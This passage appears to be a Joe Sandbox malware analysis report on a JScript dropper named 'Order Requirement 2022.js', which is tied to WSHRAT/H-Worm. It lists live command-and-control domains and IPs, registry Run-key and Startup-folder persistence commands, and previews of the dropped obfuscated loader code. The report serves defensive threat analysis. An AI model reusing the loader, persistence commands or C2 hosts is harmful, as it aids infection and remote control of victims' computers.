              http://javaautorun.duia.ro:5465/VreMewscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readym32wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/VreZXNwb25zwscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/VreZXNwb25zf/wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/VreSwscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readysL8wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org/1wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/VreNwscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org/ilter-0000wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org/onwscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyaswscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/VreMwscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/VredmFyIGZywscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyANwscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vre#wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyed.wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vre1_wscript.exe, 0000000E.00000002.819896845.000001E4548B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readytwscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmptrue
                		unknown
                http://javaautorun.duia.ro:5465/Vres);wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://jbd231.duckdns.org:2022/is-readyewscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://javaautorun.duia.ro:5465/Vre.wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://javaautorun.duia.ro:5465/Vre0wscript.exe, 00000001.00000003.379518455.00000228B31AF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://javaautorun.duia.ro:5465/Vreoiwscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://javaautorun.duia.ro:5465/VrehNwscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://javaautorun.duia.ro:5465/Vreorwscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://jbd231.duckdns.org:2022/is-readyady.wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                109.248.150.138
                		unknownRussian Federation
                		52048DATACLUBLVtrue
                154.120.126.87
                		javaautorun.duia.roNigeria
                		37340SpectranetNGtrue
                109.248.144.237
                		jbd231.duckdns.orgRussian Federation
                		60567DATACLUB-SEtrue

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:715072
                Start date and time:2022-10-03 15:55:21 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 1s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Order Requirement 2022.js
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • GSI enabled (Javascript)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.expl.evad.winJS@20/6@14/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .js
                • Override analysis time to 240s for JS/VBS files not yet terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:56:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 wscript.exe //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js"
                15:56:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 wscript.exe //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js"
                15:56:40AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 wscript.exe //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js"
                15:56:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js
                15:56:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                109.248.150.138Payment-Swift 30-09-2022.jsGet hashmaliciousBrowse
                • jbd231.duckdns.org:2022/is-ready
                Swift Payment PENPO-0409SSI-032022.jsGet hashmaliciousBrowse
                • jbd231.duckdns.org:2022/is-ready
                Purchase Order7100712022.jsGet hashmaliciousBrowse
                • jbd231.duckdns.org:2022/is-ready

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                javaautorun.duia.roPO No.77466.pdf.jsGet hashmaliciousBrowse
                • 5.62.34.46
                New Purchase Order Ref_0028839.jsGet hashmaliciousBrowse
                • 5.62.34.46
                PO_UIBHHX_1.jsGet hashmaliciousBrowse
                • 5.62.34.46
                px6K9mVOB7.jsGet hashmaliciousBrowse
                • 41.217.31.194
                7WSibRX0sg.jsGet hashmaliciousBrowse
                • 41.217.31.194
                P8Pd2TWCdu.jsGet hashmaliciousBrowse
                • 41.217.31.194
                Orden de Compra QUO19009451 FMC.jsGet hashmaliciousBrowse
                • 41.217.31.194
                Details.jsGet hashmaliciousBrowse
                • 95.142.119.7
                FzZIQcZdse.jsGet hashmaliciousBrowse
                • 95.142.119.7
                Confirmation transfer Copy MT103 Ref_000101237829382.jarGet hashmaliciousBrowse
                • 95.142.119.7
                Payment-Swift 30-09-2022.jsGet hashmaliciousBrowse
                • 41.217.28.47
                COMPLAINT.pdf.jsGet hashmaliciousBrowse
                • 95.142.119.6
                CREDIT NOTE.jsGet hashmaliciousBrowse
                • 95.142.119.6
                New PO 2235788.jsGet hashmaliciousBrowse
                • 154.120.120.217
                New PO 2235788.jsGet hashmaliciousBrowse
                • 154.120.120.217
                Shipping Documents.jsGet hashmaliciousBrowse
                • 154.120.120.217
                Order Confirmation_OV220001820_29 0922.jsGet hashmaliciousBrowse
                • 154.120.120.217
                Swift Payment PENPO-0409SSI-032022.jsGet hashmaliciousBrowse
                • 154.120.120.217
                CREDIT NOTE.jsGet hashmaliciousBrowse
                • 154.120.120.217
                4a58878306dd46ec10925bd0e105f74a.jsGet hashmaliciousBrowse
                • 154.120.120.217
                jbd231.duckdns.orgPayment-Swift 30-09-2022.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Swift Payment PENPO-0409SSI-032022.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Purchase Order7100712022.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Payments Pending July2022.jsGet hashmaliciousBrowse
                • 109.248.150.138
                New Order for October.jsGet hashmaliciousBrowse
                • 109.248.150.138
                adwind.jarGet hashmaliciousBrowse
                • 109.248.150.138
                ION LABZ Statement.jsGet hashmaliciousBrowse
                • 109.248.150.138
                21-09-2022_Payment.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Statement & invoices.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Statement & invoices.jsGet hashmaliciousBrowse
                • 109.248.150.138
                AC_Statement.jsGet hashmaliciousBrowse
                • 109.248.150.138
                AC_Statement.jsGet hashmaliciousBrowse
                • 109.248.150.138
                September Order.jsGet hashmaliciousBrowse
                • 46.183.221.43
                September Order.jsGet hashmaliciousBrowse
                • 46.183.221.43
                September RFQ.jsGet hashmaliciousBrowse
                • 46.183.221.43
                September RFQ.jsGet hashmaliciousBrowse
                • 46.183.221.43
                RFQ_07202022.jsGet hashmaliciousBrowse
                • 46.183.221.43
                RFQ_07202022.jsGet hashmaliciousBrowse
                • 46.183.221.43

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                SpectranetNGbk.mips-20221002-1437.elfGet hashmaliciousBrowse
                • 41.217.127.108
                bk.arm5-20221002-0650.elfGet hashmaliciousBrowse
                • 41.217.127.116
                bk.arm4-20221002-0650.elfGet hashmaliciousBrowse
                • 41.217.127.165
                px6K9mVOB7.jsGet hashmaliciousBrowse
                • 41.217.31.194
                skid.mipsGet hashmaliciousBrowse
                • 41.217.127.148
                7WSibRX0sg.jsGet hashmaliciousBrowse
                • 41.217.31.194
                P8Pd2TWCdu.jsGet hashmaliciousBrowse
                • 41.217.31.194
                Orden de Compra QUO19009451 FMC.jsGet hashmaliciousBrowse
                • 41.217.31.194
                bk.arm4-20221001-0632.elfGet hashmaliciousBrowse
                • 41.217.127.166
                psLQtVD9UZ.elfGet hashmaliciousBrowse
                • 154.118.94.220
                Payment-Swift 30-09-2022.jsGet hashmaliciousBrowse
                • 41.217.28.47
                bk.mips-20220929-2309.elfGet hashmaliciousBrowse
                • 41.217.127.112
                bk.mpsl-20220929-2309.elfGet hashmaliciousBrowse
                • 41.217.104.43
                bk.arm4-20220929-1806.elfGet hashmaliciousBrowse
                • 41.217.127.149
                New PO 2235788.jsGet hashmaliciousBrowse
                • 154.120.120.217
                New PO 2235788.jsGet hashmaliciousBrowse
                • 154.120.120.217
                Shipping Documents.jsGet hashmaliciousBrowse
                • 154.120.120.217
                Order Confirmation_OV220001820_29 0922.jsGet hashmaliciousBrowse
                • 154.120.120.217
                Swift Payment PENPO-0409SSI-032022.jsGet hashmaliciousBrowse
                • 154.120.120.217
                CREDIT NOTE.jsGet hashmaliciousBrowse
                • 154.120.120.217
                DATACLUBLVPO_UIBHHX_1.jsGet hashmaliciousBrowse
                • 84.38.132.47
                Payment-Swift 30-09-2022.jsGet hashmaliciousBrowse
                • 109.248.150.138
                BL-SZPCL912550.docx.docGet hashmaliciousBrowse
                • 84.38.130.219
                BL-SZPCL912550.docx.docGet hashmaliciousBrowse
                • 84.38.130.219
                Swift Payment PENPO-0409SSI-032022.jsGet hashmaliciousBrowse
                • 109.248.150.138
                GZWPRD.exeGet hashmaliciousBrowse
                • 109.248.150.140
                Purchase Order7100712022.jsGet hashmaliciousBrowse
                • 109.248.150.185
                Payments Pending July2022.jsGet hashmaliciousBrowse
                • 109.248.150.185
                New Order for October.jsGet hashmaliciousBrowse
                • 109.248.150.138
                adwind.jarGet hashmaliciousBrowse
                • 109.248.150.138
                ION LABZ Statement.jsGet hashmaliciousBrowse
                • 109.248.150.138
                4UFDZIFcpa.rtfGet hashmaliciousBrowse
                • 84.38.130.219
                21-09-2022_Payment.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Statement & invoices.jsGet hashmaliciousBrowse
                • 109.248.150.138
                Statement & invoices.jsGet hashmaliciousBrowse
                • 109.248.150.138
                AC_Statement.jsGet hashmaliciousBrowse
                • 109.248.150.138
                AC_Statement.jsGet hashmaliciousBrowse
                • 109.248.150.138
                PO-HEMPEL PAINTS.docxGet hashmaliciousBrowse
                • 84.38.135.157
                September Order.jsGet hashmaliciousBrowse
                • 46.183.221.43
                September Order.jsGet hashmaliciousBrowse
                • 46.183.221.43

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Roaming\CekIalTska.js

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with very long lines (24033), with CRLF line terminators
                Category:dropped
                Size (bytes):34202
                Entropy (8bit):5.996401349775698
                Encrypted:false
                SSDEEP:768:IxHXotUvvb7O8F9rKVsCnKO3Ab+fHVrvjvNapwjPF:cotUvHQeKfHJDNapwj9
                MD5:7D3813B6915E33AEB2AFFC2C3FF7F04B
                SHA1:6E3E1AA58E9EBCB2CC2D334AC6C8AE9747BB38A4
                SHA-256:CBD6DE4D1EACC777A082333735D588B04E7E96C6223A95E0E07B5A8A85CEDA72
                SHA-512:FB07C39675C26691E9F733B30302A666225A4186157CB6612EEA8B9FE11D2F42E3440A43AADDBDA362FCC181BC1E7106566F51085330C59ECA6A1EBA2CB12017
                Malicious:true
                Preview:..// String function has modified FUDCRYPT..$5FZwLPDuLmhd3toN49z=function(n){if (typeof ($5FZwLPDuLmhd3toN49z.list[n]) == "string") return $5FZwLPDuLmhd3toN49z.list[n].split("").reverse().join("");return $5FZwLPDuLmhd3toN49z.list[n];};..$5FZwLPDuLmhd3toN49z.list=[/>!/g,"vHBWeN212151","uXWmnN5292711","ambrqc15304531","siKbij631881","EVxaQM604764","TnRnFI079312","WEeKjw029371","=oQD9pQD9pQD7BSKyJXZog2Y0F2Yg0nCNsTKlVnc0xib3ByKgICXcJCIr!>Ca0FGUuYGblNlLpcDKlNWYwNVZtFmTu!>XYgwSdmhSZslmR5B3bD5ycmpQD7kiMoI3Qg0DIwFGIyFmdK0wegknc0pQD9pQD7BSKyJXZog2Y0F2Yg0nCNsTKdVzWnxiIiwlIgsCI1ZGIr!>iIiwlIsICRyIzTaVkS3czVi!>yKg01MbdGIr!>SXws1ZoUGdpJ3VnVmUug2cK0wegknc0pQD7BSKoMnTg42bpR3YuVnZK0QfK0QfK0QfK0wOrFWZyJmCNsjclJWb15GbhlmclNXZtVHbvZnL0lGIuJXd0VmcK0wOpgSblRXau4WZg0DI0lGIyFmdK0wegkSKoQHel5UZ29Wbu4WZ7kCKk5WR0FmLuVWIgsDKgI3bmpQD7kycoI3b0Fmcl1WduVEI3Vmbg0DIuVGIyFmdK0wOp0VMblHKm90clNmbhR3culkLp0FMblHK0NWZqJ2T0V2Rg0DIzpQD7BSK20TPOhCImlmCN0nCN0nCNsTZtFmT5FGbwNXaE5CdpBibyVHdlJnCNsHIlNHblBSfK0QfK0wOl1WYOlXYsB3cpRkL

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with very long lines (24033), with CRLF line terminators
                Category:modified
                Size (bytes):34202
                Entropy (8bit):5.996401349775698
                Encrypted:false
                SSDEEP:768:IxHXotUvvb7O8F9rKVsCnKO3Ab+fHVrvjvNapwjPF:cotUvHQeKfHJDNapwj9
                MD5:7D3813B6915E33AEB2AFFC2C3FF7F04B
                SHA1:6E3E1AA58E9EBCB2CC2D334AC6C8AE9747BB38A4
                SHA-256:CBD6DE4D1EACC777A082333735D588B04E7E96C6223A95E0E07B5A8A85CEDA72
                SHA-512:FB07C39675C26691E9F733B30302A666225A4186157CB6612EEA8B9FE11D2F42E3440A43AADDBDA362FCC181BC1E7106566F51085330C59ECA6A1EBA2CB12017
                Malicious:true
                Preview:..// String function has modified FUDCRYPT..$5FZwLPDuLmhd3toN49z=function(n){if (typeof ($5FZwLPDuLmhd3toN49z.list[n]) == "string") return $5FZwLPDuLmhd3toN49z.list[n].split("").reverse().join("");return $5FZwLPDuLmhd3toN49z.list[n];};..$5FZwLPDuLmhd3toN49z.list=[/>!/g,"vHBWeN212151","uXWmnN5292711","ambrqc15304531","siKbij631881","EVxaQM604764","TnRnFI079312","WEeKjw029371","=oQD9pQD9pQD7BSKyJXZog2Y0F2Yg0nCNsTKlVnc0xib3ByKgICXcJCIr!>Ca0FGUuYGblNlLpcDKlNWYwNVZtFmTu!>XYgwSdmhSZslmR5B3bD5ycmpQD7kiMoI3Qg0DIwFGIyFmdK0wegknc0pQD9pQD7BSKyJXZog2Y0F2Yg0nCNsTKdVzWnxiIiwlIgsCI1ZGIr!>iIiwlIsICRyIzTaVkS3czVi!>yKg01MbdGIr!>SXws1ZoUGdpJ3VnVmUug2cK0wegknc0pQD7BSKoMnTg42bpR3YuVnZK0QfK0QfK0QfK0wOrFWZyJmCNsjclJWb15GbhlmclNXZtVHbvZnL0lGIuJXd0VmcK0wOpgSblRXau4WZg0DI0lGIyFmdK0wegkSKoQHel5UZ29Wbu4WZ7kCKk5WR0FmLuVWIgsDKgI3bmpQD7kycoI3b0Fmcl1WduVEI3Vmbg0DIuVGIyFmdK0wOp0VMblHKm90clNmbhR3culkLp0FMblHK0NWZqJ2T0V2Rg0DIzpQD7BSK20TPOhCImlmCN0nCN0nCNsTZtFmT5FGbwNXaE5CdpBibyVHdlJnCNsHIlNHblBSfK0QfK0wOl1WYOlXYsB3cpRkL

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with very long lines (34370)
                Category:dropped
                Size (bytes):129780
                Entropy (8bit):5.843744998042904
                Encrypted:false
                SSDEEP:3072:roUKfHvYLgmM4ZmXYYrNzrLrSEhJU4G0pf:roUKfHvYLM4Y/xzrLfT
                MD5:B276C36493BB9FA92DF1F59895B5D777
                SHA1:8D5D49BB030505DE7C0888E18B47015DB4890C5A
                SHA-256:F962DA43F295B3508BC4B46215843A9777144E79113548546DCFA4C381B3BCB7
                SHA-512:A1994A7DC9022F8540444A565DB1FB5C719138784DC92E45A49BCBB0B8DBD3141C02BFAC347A84CCB011BEBC57DFDC7C4EDCF472C95C687ACBA95E211B513951
                Malicious:true
                Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js:Zone.Identifier

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Users\user\AppData\Roaming\Order Requirement 2022.js

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with very long lines (34370)
                Category:dropped
                Size (bytes):129780
                Entropy (8bit):5.843744998042904
                Encrypted:false
                SSDEEP:3072:roUKfHvYLgmM4ZmXYYrNzrLrSEhJU4G0pf:roUKfHvYLM4Y/xzrLfT
                MD5:B276C36493BB9FA92DF1F59895B5D777
                SHA1:8D5D49BB030505DE7C0888E18B47015DB4890C5A
                SHA-256:F962DA43F295B3508BC4B46215843A9777144E79113548546DCFA4C381B3BCB7
                SHA-512:A1994A7DC9022F8540444A565DB1FB5C719138784DC92E45A49BCBB0B8DBD3141C02BFAC347A84CCB011BEBC57DFDC7C4EDCF472C95C687ACBA95E211B513951
                Malicious:true
                Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to

                C:\Users\user\AppData\Roaming\Order Requirement 2022.js:Zone.Identifier

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                Static File Info

                General

                File type:ASCII text, with very long lines (41216), with CRLF line terminators
                Entropy (8bit):5.768003162741704
                TrID:
                  File name:Order Requirement 2022.js
                  File size:118259
                  MD5:e873a424159d2557551d0f4684af7a5f
                  SHA1:7dfcc66a95100143fae12531151355d2016718f0
                  SHA256:0d5a587f0c1dcff512f6112ee48859608db08307aa39887cc71480998d7070d4
                  SHA512:b8c9845734a0ec5c5d2e572b34df59baa1520fc12ca0f3377b0c5fff65239e08d876b39aac57c3a53138583d6c5c7cb6c2d181d8f46f962c4fe42b27106f9660
                  SSDEEP:3072:coUKfH3YLgmM4ZmXYYrNzrLrSEhJU4G0p3:coUKfH3YLM4Y/xzrLfr
                  TLSH:6CC3CF74DD378B70DBE41E0599FCEF1E5FB0094E642264DFBB84564AE26090CE10EBA9
                  File Content Preview:..// String function has modified FUDCRYPT..$5FZwLPDuLmhd3toN49z=function(n){if (typeof ($5FZwLPDuLmhd3toN49z.list[n]) == "string") return $5FZwLPDuLmhd3toN49z.list[n].split("").reverse().join("");return $5FZwLPDuLmhd3toN49z.list[n];};..$5FZwLPDuLmhd3toN4

                  File Icon

                  Icon Hash:e8d69ece968a9ec4

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.5109.248.150.1384973320222017516 10/03/22-15:58:08.503396TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497332022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384980020222017516 10/03/22-16:00:06.684129TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1498002022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384978220222017516 10/03/22-15:59:34.417510TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497822022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384979620222017516 10/03/22-16:00:01.475367TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497962022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384974320222017516 10/03/22-15:58:25.510035TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497432022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384974920222017516 10/03/22-15:58:35.892450TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497492022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384973720222017516 10/03/22-15:58:13.983128TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497372022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384979220222017516 10/03/22-15:59:50.918382TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497922022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384980620222017516 10/03/22-16:00:17.051647TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1498062022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384973220222017516 10/03/22-15:58:03.289656TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497322022192.168.2.5109.248.150.138
